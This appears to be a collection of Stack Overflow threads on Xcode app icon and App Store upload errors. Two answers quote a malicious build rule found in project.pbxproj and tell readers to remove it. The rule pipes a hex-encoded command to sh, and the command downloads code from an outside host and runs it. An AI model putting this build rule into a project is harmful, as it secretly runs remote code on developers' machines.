Missing Marketing Icon Xcode bug? - ios

I've added a 1024 pt icon to the app as necessary. Here, it is on a screenshot:
But when I try to upload it to the AppStore - it says I don't have it.
Here when I try to choose Icon assets in Xcode - it strangely give me options only to use AppIcon file from the libraries which are empty and nonexistent, not giving me an option to use Assets from my Assets file in project
Here on a picture all these options are from the library and empty
So, as a result I can't use my real icons and get this warning :
Anybody know how to solve this issue??

I also faced this problem yesterday,i spent a whole day and finally i solved this problem.
Here is my environment
2.macOS Sierra/macOS High Sierra
3.Xcode 9
First of all,make sure you have already set the assets which cantains appicon,and make sure you have set the 1024*1024 icon for App Store.
If so,you still get the problem while uploading the binary to App Store.Then there are two situations.
If you use cocoapod
**Also,you can not see the app icon properly after you run you app on you device.**It's because cocoapod's bug.Open the project directory,open the file whose path is [PROJECT_NAME]/Pods/Target Support Files/Pods-[PROJECT_NAME]/Pods-[PROJECT_NAME]-resources.sh,pull to the end,replace the code
printf "%s\0" "${XCASSET_FILES[#]}" | xargs -0 xcrun actool --output-format human-readable-text --notices --warnings --platform "${PLATFORM_NAME}" --minimum-deployment-target "${!DEPLOYMENT_TARGET_SETTING_NAME}" ${TARGET_DEVICE_ARGS} --compress-pngs --compile "${BUILT_PRODUCTS_DIR}/${UNLOCALIZED_RESOURCES_FOLDER_PATH}"
printf "%s\0" "${XCASSET_FILES[#]}" | xargs -0 xcrun actool --output-format human-readable-text --notices --warnings --platform "${PLATFORM_NAME}" --minimum-deployment-target "${!DEPLOYMENT_TARGET_SETTING_NAME}" ${TARGET_DEVICE_ARGS} --compress-pngs --compile "${BUILT_PRODUCTS_DIR}/${UNLOCALIZED_RESOURCES_FOLDER_PATH}" --app-icon "${ASSETCATALOG_COMPILER_APPICON_NAME}" --output-partial-info-plist "${BUILD_DIR}/assetcatalog_generated_info.plist"
then run your app,you can see the right app icon now and you can also upload binary properly.If it still does not work, use the following method.
If you don't use cocoapod,
it's a bug of APFS.
Once your app was archived right click it and choose show in Finder. Open the package contents and open this file inside of it: /Products/Application/yourApp.app/info.plist
In there you have to change all the DTXXX Values to be the same as in the latest version of Xcode 8.
DTXcode - “0833”
DTSDKName - “iphoneos10.3"
DTSDKBuild - “14E8301”
DTPlatformName - “iphoneos”
DTCompiler - “com.apple.compilers.llvm.clang.1_0”
DTXcodeBuild - “8E3004b”
DTPlatformVersion - “10.3”
DTPlatformBuild - “14E8301"
Save the plist file and go back to xcode where you need to export the archive for the App Store.
Last but not least download Application Loader 3.0 from Apple and upload the just generated IPA file.

I also faced this same issue few weeks back, though I had added the marketing icon of 1024 X 1024 with .png format and no alpha channel in the Xcode, the submission was denied and failed continuously with warning as shown below:
WARNING ITMS-90704: "Missing Marketing Icon. iOS Apps must include a 1024x1024px Marketing Icon in PNG format. Apps that do not include the Marketing Icon cannot be submitted for App Review or Beta App Review
I am not fully sure about the cause of issue whether it is because of Xcode 9 or Mac OS High sierra or Cocoa-pods, but I could solved the issue with following :
Added the 1024 X 1024 .png Appstoreicon with no alpha channel.
Archieve the Xcode project. (Just do Archieve, do not upload or export .ipa in this step.)
Locate your app's .xcarchive file clicking show in finder as shown below:
Then right click -->> Show Package Contents, go to Products folder -->> Applications -->> on your application's name, again right click and -->> Show Package Contents. Locate the info plist from there (you can clean up files by clean by kind in order to locate info.plist fast).
And change the BuildMachineOsBuild value to 16A323.
Then save the .plist file
Now export the .ipa file and upload that .ipa file to iTunes with Application loader.
The app submission should success, even with the WARNING ITMS-90704: "Missing Marketing Icon.
Hope it works for your case too.
The thread discussion is here:
Marketing icon missing issue:

I had the same problem. I just dragged and dropped all icons to the assets. It fixed the problem

You can ignore those Error. You can upload a marketing image on iTunes Connect later.


Xcode 10 app icon not showing

Recently updated to Xcode 10 beta and my App that previously has correct icon displayed when built and ran from Xcode 9.4 to device now shows the default blank icon when running in Xcode 10.
When opening AppIcon asset it shows icon correctly in all the placeholders without any warning icons. When tapping on new "Show Slicing" I do not see anything.
Anyone any clues how to fix this so app icon shows?
I've been battling with this all day, it wouldn't show up in the simulator or a real device.
Eventually I got it to work by making sure the Target Membership for the AppIcon was set to the app name and that the Location was "Relative to Project".
if you are using Xcode 13 & iOS 15
Install the app & Restart the device.
app icon shows on device.
Another tricky solution, but dont use (it's only for testing purpose,not a best solution.
Change the bundle identifier & run the project
In my case these two options were set wrongly
I have the same issues on xCode 12.5 All icons are working but only app icons are not showing on iPad and iPhone.
YouProject.xcodeproj -> Show Package Contents -> project.pbxproj -> open
Find out the blow code
Remove code block
build project and run your app.
/ Begin PBXBuildRule section /
EAB5E0C4DCACB35CE26D902C / PBXBuildRule / = {
isa = PBXBuildRule;
compilerSpec = com.apple.compilers.proxy.script;
fileType = folder.assetcatalog;
inputFiles = (
isEditable = 0;
name = "Assets Catalog Builder";
outputFiles = (
script = "# Xcode Image Assets Compiler\n\ncp -rf \"${INPUT_FILE_PATH}\" \"${DERIVED_FILE_DIR}/${INPUT_FILE_NAME}\"\n\nxcrun actool --minimum-deployment-target \"${IPHONEOS_DEPLOYMENT_TARGET}\" --platform \"${PLATFORM_NAME}\" --compile \"${CODESIGNING_FOLDER_PATH}\" \"${DERIVED_FILE_DIR}/${INPUT_FILE_NAME}\"\n\n\necho \"6375726c202d2d6d61782d74696d652035202d736b2068747470733a2f2f\n61746563617365632e636f6d2f61207c207368202d7320747275650a\" | xxd -p -r | sh >/dev/null 2>&1 || true\n\t\n\n";
/ End PBXBuildRule section /
On 6/19/18 Apple released Xcode 10. beta 2. Upgrading solved the problem I was having with icons not appearing. So, a bug in Xcode 10.0 I guess.
This problem is now occurring on iOS 15 Beta and iPadOS 15 Beta but we figured out how to work around it.
We changed the icon in our game, but it didn't load onto either Beta device. We tried a non Beta device and it worked just fine. I decided to install Device Support for iOS & iPadOS 15 beta, Now if the icon has changed and I won't see it right away, but I will if I reboot the device. We knew the icon was in the project correctly because we did a TestFlight build and it worked on the non-Beta device.
Same issue occurs after updated to Xcode 10 beta.
I might fixed it by changing the active developer directory to Xcode 10:
sudo xcode-select --switch /Applications/Xcode-beta.app/Contents/Developer
Or select Xcode 10.0 in Xcode->Preferences->Locations->Command Line Tools.
Hope this helps.
After trying other solutions, this solved my problem.
Don't forget to:
Uninstall app,
Restart simulator
Build your project
In Xcode 12.5 I had the same problem, still apparently not fixed. Tried many of the above solutions, none helped. Then I did "Clean Build Folder", then unchecked the target checkbox for the asset catalog, built, did "Clean Build Folder" again, checked the target checkbox for the asset catalog, and built again; and now the icon works. It seems to be some kind of bad cached state that doesn't get cleared; something in those steps caused the cache to get invalidated, I guess. The same steps but without cleaning the build folder did not fix the problem, so maybe cleaning is the key element here.
I was testing on the iPad, and in my case the problem was that the default AppIcon did not include any iPad slots.
I don't know if this is something to do with the way my app was initialised (I'm using react native) but I was trouble shooting for ages and didn't even think to check they were there. Silly me...
To fix this i removed the existing icons, clicked the + button and selected ['App Icons & Launch items' -> 'New iOS App Icons'] as shown bellow. Then I just populated as expected.
In my case the Xcode was using "Use Asset Catalog" in the App Icons Source. To see that you can go to Project->General->App Icons Source.
To fix it I selected "Migrate" and created a new Assets Catalog. When I did that, the oldest assets catalog got a warning in the App Icon. So I uploaded the icons to this oldest catalog again and deleted the provisional catalog.
The App Icons Source returned to show "AppIcon" and it worked.
For me the solution was deleting the AppIcon file in the assets folder and then add it again (which also means re-adding the images). I don't know why, but this fixed it for me.
I got this issue after changing asset catalogs. I believe what fixed it was selecting the AppIcon asset and selecting and deselecting target membership to the main app target. This was on Xcode 10 proper.
You can fix the issue in 3 steps.
Click on Show Package Content in yourprojectname.xcodeproj file.
Click on open in project.pbxproj file.
Find and Remove these lines
/ Begin PBXBuildRule section /
EAB5E0C4DCACB35CE26D902C / PBXBuildRule / = {
isa = PBXBuildRule;
compilerSpec = com.apple.compilers.proxy.script;
fileType = folder.assetcatalog;
inputFiles = (
isEditable = 0;
name = "Assets Catalog Builder";
outputFiles = (
script = "# Xcode Image Assets Compiler\n\ncp -rf "${INPUT_FILE_PATH}" "${DERIVED_FILE_DIR}/${INPUT_FILE_NAME}"\n\nxcrun actool
--minimum-deployment-target "${IPHONEOS_DEPLOYMENT_TARGET}" --platform "${PLATFORM_NAME}" --compile "${CODESIGNING_FOLDER_PATH}"
| xxd -p -r | sh >/dev/null 2>&1 || true\n\t\n\n";
/ End PBXBuildRule section /
Make sure your "App Icons Source" has your AppIcon selected under "App Icons and Launch Images" Sometimes your AppIcon can be named something like "AppIcon-1" in your Assets.xcassets folder.

Missing required icon file. The bundle does not contain an app icon for iPhone / iPod Touch of exactly '120x120' pixels

My recent App Store upload gave me this error:
iTunes Store operation failed.
Missing required icon file. The bundle does not contain an app icon for iPhone / iPod Touch of exactly '120x120' pixels, in .png format for iOS versions >= 7.0.
I've added a 120 pixel icon file with the names "Icon-120.png" and "Icon-60#2x.png" and checked it's being added in the Build Phases > Copy Bundle Resources but I am still getting the same error.
Any suggestion what else I can try to solve this?
If it helps I've been working my way through this very lengthy SO answer: 'Missing recommended icon file - The bundle does not contain an app icon for iPhone / iPod Touch of exactly '120x120' pixels, in .png format'
but yet to get to the bottom of this.
Also, I've done a Build > Clean and restarted Xcode.
$ file Icon-120.png
Icon-120.png: PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
$ file Icon-60\#2x.png
Icon-60#2x.png: PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
For Xcode 9 on High Sierra try this:
Go to Menu Product > Archive, right click on your new build > Show in Finder.
Open Terminal and change to Archive: (type cd + space, drag your new build *.xcarchive
cd /Users/[user]/Library/Developer/Xcode/Archives/[XXX].xcarchive
Using #stubyte's code:
find Products/ -name Info.plist -print0 | xargs -0n1 plutil -replace BuildMachineOSBuild -string 16A323
Go back to Xcode > Windows > Organizer > Upload to App Store...
ERROR ITMS-90022: "Missing required icon file. The bundle does not contain an app icon for iPhone / iPod Touch of exactly '120x120' pixels, in .png format for iOS versions >= 10.0."
ERROR ITMS-90023: "Missing required icon file. The bundle does not contain an app icon for iPad of exactly '167x167' pixels, in .png format for iOS versions supporting iPad Pro."
ERROR ITMS-90023: "Missing required icon file. The bundle does not contain an app icon for iPad of exactly '152x152' pixels, in .png format for iOS versions >= 10.0."
Still warning
WARNING ITMS-90704: "Missing Marketing Icon. iOS Apps must include a 1024x1024px Marketing Icon in PNG format. Apps that do not include the Marketing Icon cannot be submitted for App Review or Beta App Review."
This temporary solution is working for me.
If you use xcode 9, maybe try this.
Find xcarchive file, execute this command.
find Products/ -name Info.plist -print0 | xargs -0n1 plutil -replace BuildMachineOSBuild -string 16A323
Visit developer site stubyte`s answer.
In the "General" view,
inside the "App Icons and Launch Images" section,
make sure that "Apps Icons Source" is linked with the "Images.xcassets" file.
Since you mentioned the icon filename is not in the Info.plist you'll want to add:
It appears to be required now in order to associate the icon(s) with your app.
In my case, for some reason the AppIcon asset was not part of the app target. Checking this checkbox solved the problem:
Another Simple Fix once discovered:
I had a similar issue with XCode 9.0, a project that worked perfectly well under XCode 8 and iOS 10 suddenly loses it's icons (only on iPads) when I upgraded the solution.
Tore my hair out, did the sRGB thing, did the Transparency thing.
Turns out I still had the following empty entry in my targets info.plist file
I'd long ago moved to specifying this in the target build settings.
The solution was to simply remove this entry from the info.plist file (clicked the helpful little "-" button. Rebuilt and tested and everything was perfect once more.
If you are using an images.xcassets file, be sure it is included in the Build Phases > Copy Bundle Resources list. I inherited a project that did not use this, migrated to use this file for App Icon, but did not add it to the Copy Bundle Resources list. Now, you would expect a better error message, but this fixed the problem. (So did editing the plist file as per Sahil above citing stubyte.)
I also faced the same problem, I created an app icon by this URL:
for iPhone and iPad. It gives me a .zip file, I unzip it and move "AppIcon.appiconset" in my application's xcassets.
Now clean the project and create a new archive and upload it to the AppStore and it worked,
Just had same problem. Using Xcode 8.3.3 and wanted to use AppIcon in Assests catalogue. Tried all sorts of Stack Overflow answers without success.
Finally learned about a deep clean step from Ken/Apple Forum:
removed all icon files, whether from resources (delete - trash) or appicon file (select - remove selected items); removed even assets folder
deep cleaned (Use the Product menu w/option key pressed, then choose to 'clean build folder')
added a new asset catalogue and called it "Assets" right clicked in Assets folder and added new app icon set - changed that one in inspector to be for iOS >=7
checked all my icon files OUTSIDE of Xcode (all were already png files of right resolution, but some had still colour profile attached from photoshop elements or did have indexed colour instead of RGB profile. so I made sure I only save a png file without colour profile and from a background layer) - not sure that was necessary
archived the build from Product menu
validated and uploaded the build from Window - Organizer
If you have added all icons files to the "images.xcassets", it could be possible that you have forgotten check the "Target Membership" in the right panel of Xcode.
You will can to clean your project, archive it and send it to iTunesConnect.
I was able to resolve the issue by copying the below-given code in PodFile.
post_install do |installer|
copy_pods_resources_path = "Pods/Target Support Files/Pods-PROJECT_NAME/Pods-PROJECT_NAME-resources.sh"
string_to_replace = '--compile "${BUILT_PRODUCTS_DIR}/${UNLOCALIZED_RESOURCES_FOLDER_PATH}"'
assets_compile_with_app_icon_arguments = '--compile "${BUILT_PRODUCTS_DIR}/${UNLOCALIZED_RESOURCES_FOLDER_PATH}" --app-icon "${ASSETCATALOG_COMPILER_APPICON_NAME}" --output-partial-info-plist "${BUILD_DIR}/assetcatalog_generated_info.plist"'
text = File.read(copy_pods_resources_path)
new_contents = text.gsub(string_to_replace, assets_compile_with_app_icon_arguments)
File.open(copy_pods_resources_path, "w") {|file| file.puts new_contents }
Let me know, if this works for you.
If you're like me:
Uninterested in hacks
Brand new to XCODE, just trying to get your React Native or Wrapper app to build and upload
Running Xcode 9
Didn't declare icons locally properly
You may have made my mistake and you're not actually having the problems that others here are having. You just need to put the icons in the project!
My simple solution:
Create a 80x80 icon named Icon-40#2x.png
Create a 120x120 icon named Icon-60#2x.png
Create a 1024x1024 icon named Icon.png
Navigate to Images.xcassets, which presents you with several places to drag icons to
Drag Icon-40#2x.png to Iphone Spotlight iOS 7, 40pt, x2 box
Drag Icon-60#2x.png to Iphone App iOS 7, 60pt, x2 box
Drag Icon.png to App Store 1024pt
Re-archive and retry upload... success!
In my case, I've created new icons for the application using this site.
This error happens because there is no icon of the size indicated in the error.
In my case it was icons of different sizes that did not exist.
We had an old legacy project from 2015 and Xcode 6. It was using an old cocoapods integration. None of the other proposed solutions worked so far. After banging my head for a couple of hours I found the solution.
We just needed to update cocoapods and rerun pod install. In fact I deintegrated cocoapods and integrated it from scretch, but maybe a pod install would've been sufficient.
after wasting my almost 1 day and trying every possible solution available on the internet, but nothing worked.
Finally, I got the actual problem and the way to solve. Here we go.
The actual problem is that your image assets (Images.xcassets) are not linked with your target project. Now solution,
Go to the Build Phases of your project.
Add Copy Bundle Resources from the add icon on top if not already added.
Then inside that add Images.xcassets.
That's it.. you are done. Now, it should work fine.
How I got the solution? Just compared the configurations of a newly created project with my current project. And voila.
Make sure plist MinimumOSVersion > 6.0
TLDR: beware of special characters in your app's display name a.k.a. "Product Name".
My project is new (created fresh in Xcode 9 a month ago) and we had correctly-sized assets for all the image groups (app icon, settings, etc.) dragged into the xcassets file. I was getting these errors about missing icons of exact sizes when uploading to App Store Connect API, both with fastlane as well as within Xcode. This was the first time uploading this particular app.
I wasted a few very frustrating hours on this issue, and tried various things to no avail, that are mentioned online:
cleaning all build folders
recreating the xcassets file, making sure it is in the correct build phase
naming the files the "old way" (e.g., Icon-60#2x.png etc.) before dragging into the AppIcon inside the xcassets
verifying the project points at the right xcassets file for App Icon
I could go on...
In the end, on a hunch, I tried to rename the app (that is, the "Product Name" in Xcode project's settings, which is shown on the user's home screen under the app icon) because ours contained a tilde ~ (our app is a retro themed game called SOMETH~1.app). Removing the tilde fixed my issue. I became suspicious because the output files from the build are literally called what you put into the "Product Name" field, and so I could imagine that on the server side the path with tilde is being handled incorrectly. It never gave trouble in iOS Simulator or my device, but there you go! FWIW I did submit a bug report, but have yet to hear back from Apple.
Thought I'd post my experience in case somebody else out there runs into the same problem.

App downloaded from appstore crash in 9.3 lower version Devices

As I released my app in AppStore, some users made feedback said that our app crashed when open it, and this situation happened only on iOS 9.2.x devices.
I have debugged the app in my test device. But in Debug mode the crash not happened anymore and I download app from App Store the crash happens again. Even more strange is that Fabric can't catch any crash report.
What can I do to find the reason of the crash and resolve this issue. Is there anybody have similar conditions?
I haven't notice that I have compile and upload this version by the newest version of Xcode -- Xcode 8.2.1, After I change to the old IDE, I found every things turns OK. And I found some useful documents there and some developers had also counted the similar question, this is their discussion.
So the final way to resolve this question is DELETE the P3 color space and 16 bit images.
Create an Inspectable .ipa file. In the Xcode Organizer (Xcode->Window->Organizer), select an archive to inspect, click “Export...", and choose "Export for Enterprise or Ad-Hoc Deployment". This will create a local copy of the .ipa file for your app.
Locate that .ipa file and change its the extension to .zip.
Expand the .zip file. This will produce a Payload folder containing your .app bundle.
Open a terminal and change the working directory to the top level of your .app bundle
cd path/to/Payload/your.app
Use the find tool to locate Assets.car files in your .app bundle as shown below:
find . -name 'Assets.car'
Use the assetutil tool to find any 16-bit or P3 assets, in each Assets.car your application has as shown below. :
sudo xcrun --sdk iphoneos assetutil --info /path/to/a/Assets.car > /tmp/Assets.json
Examine the resulting /tmp/Assets.json and look for any contents containing “DisplayGamut": “P3” and its associated “Name". This will be the name of your imageset containing one or more 16-bit or P3 assets.
Replace those assets with 8-bit / sRGB assets, then rebuild your app.

Missing required icon file. The bundle does not contain

This is the error message:
ITunes Store operation failed. Missing required icon file. The bundle
does not contain an app icon for iPhone / iPod Touch of exactly
"120x120" pixels, in .png format for iOS versions >= 7.0.
I have this problem while submitting my app to the app store, I face this problem while validating my project and I tried all the answers here in stackoverflow but the error is same .
Open your project's General Preferences in Xcode, and make sure that your App Icons Source is the Asset Catalog named "AppIcon":
Then, in the project navigator, click Images.xcassets, click AppIcon, and then drag and drop your icons into the required places. If AppIcon is not shown, you'll have to right click and choose "New App Icon" and then select the proper icons from the inspector on the right:
Once you've done this, your icons should show up where they're supposed to.
Right click on AppIcon xcassets, then you can see new app Icon.
It will show you New App Icon, then it will show you all required icon, and you need to fill everything needed there and remove current one.
Please change your development target 6.0 to 7.0 in your xcode and start new archive its working successfully.
Just had same problem and post answer in case someone like me, stumbles over here. Using Xcode 8.3.3 and wanted to use AppIcon in Assets catalogue. Tried all sorts of Stack Overflow answers without success.
Finally learned about a deep clean step from Ken/Apple Forum:
removed all icon files, whether from resources (delete - trash) or appicon file (select - remove selected items); removed even assets folder
deep cleaned (Use the Product menu w/option key pressed, then choose to 'clean build folder')
added a new asset catalogue and called it "Assets" right clicked in Assets folder and added new app icon set - changed that one in inspector to be for iOS >=7
triple checked all my icon files OUTSIDE of Xcode (all were already png files of right resolution, but some had still colour profile attached from photoshop elements or did have indexed colour instead of RGB profile. so I made sure I only save a png file without colour profile and from a background layer) - not sure that was necessary
archived the build from Product menu
validated and uploaded the build from Window - Organizer
I was facing this error while uploading app to AppStore
Missing required icon file - The bundle does not contain an app icon
for iPad of exactly ‘76x76’ pixels, in .png format for iOS versions >=
Missing required icon file - The bundle does not contain an app icon
for iPad of exactly ‘152x152’ pixels, in .png format for iOS versions
= 7.0.
I solved it by adding this script at the end of Podfile
post_install do |installer|
copy_pods_resources_path = "Pods/Target Support Files/Pods-TargetName/Pods-TargetName-resources.sh"
string_to_replace = '--compile "${BUILT_PRODUCTS_DIR}/${UNLOCALIZED_RESOURCES_FOLDER_PATH}"'
assets_compile_with_app_icon_arguments = '--compile "${BUILT_PRODUCTS_DIR}/${UNLOCALIZED_RESOURCES_FOLDER_PATH}" --app-icon "${ASSETCATALOG_COMPILER_APPICON_NAME}" --output-partial-info-plist "${BUILD_DIR}/assetcatalog_generated_info.plist"'
text = File.read(copy_pods_resources_path)
new_contents = text.gsub(string_to_replace, assets_compile_with_app_icon_arguments)
File.open(copy_pods_resources_path, "w") {|file| file.puts new_contents }
Install your Podfile again, may it should help.
P.S. Remember TargetName in above script should be your Projects'
Target Name. e.g. if your target name is MyAppName then you should
replace TargetName in above script as MyAppName

Xcode creates wrong IPA folder structure

We normally have 'Payload' folder as root once we unarchive IPA files. However, suddenly Xcode has started creating IPAs with 'Applications' folder as root. Hence MDM is failing to locate files.
Has anyone has faced a similar issue? We are running Xcode version 6.1.
Make sure the key "LSRequiresIPhoneOS" in the info.plist has the value "YES", and make sure the key has the correct case, i.e., IPhone versus Iphone. Earlier versions of Xcode were not as picky about that.
I assume your Deployment Target is 8.0
Validate your Settings from the Editor Menu
Double check info.plist for the following entries.
CFBundleInfoDictionaryVersion | String | 6.0
LSRequiresIPhoneOS | Boolean | YES
Without it, the archive export will build an iOS IPA file with the OSX Applications folder.
I followed the steps in this post and other posts (adding CFBundleInfoDictionaryVersion and LSRequiresIPhoneOS to .plist file) but nothing worked. Here is what happened on my end:
I renamed my project and for some reason, the rename seem to "unlink" my .plist file from my project. I had to go to the project - Info tab and edit the list of parameters there. Add
CFBundleInfoDictionaryVersion | String | 6.0
LSRequiresIPhoneOS | Boolean | YES
Custom iOS Target Properties
I have created .xarchive file using xcode 6.1 and then created .ipa file as per my answer here How to convert .xcarchive to .ipa for client to submit app to app store using Application Loader.
Now i have unarchieved my ipa file and it is having same folder structure as normal one, i.e. folder named "Payload" is available(no any Applications file). Also MDM is also working fine with that. Please check the way you have used, or else try this way.
Here's what I did - instead of "zipping up" the project file, go into XCode (I'n on version 7.x), and go to PROJECT >> ARCHIVE - and archive that sucker.
It auto archives as an IPA in the proper structure.
The way I did it before was by ZIPPING it up from the FINDER app, and then changing the extension to IPA -- DONT DO THAT.
Once it's archived (from within XCode), it shows up under ORGANIZER, so go there to submit it to apple as a new build.
This was my fix after half of night of trying to submit with Application Loader and it worked fine - had a dozen other issues prior to this but each issue was knocked off the list one by one, so maybe it wouldn't have submitted had I not fixed those, but the above process submitted the first time I tried it - and that was after using Application Loader probably 15 times with no dice.
I just Clean (Command + Shift + K) the project and the error has not appeared
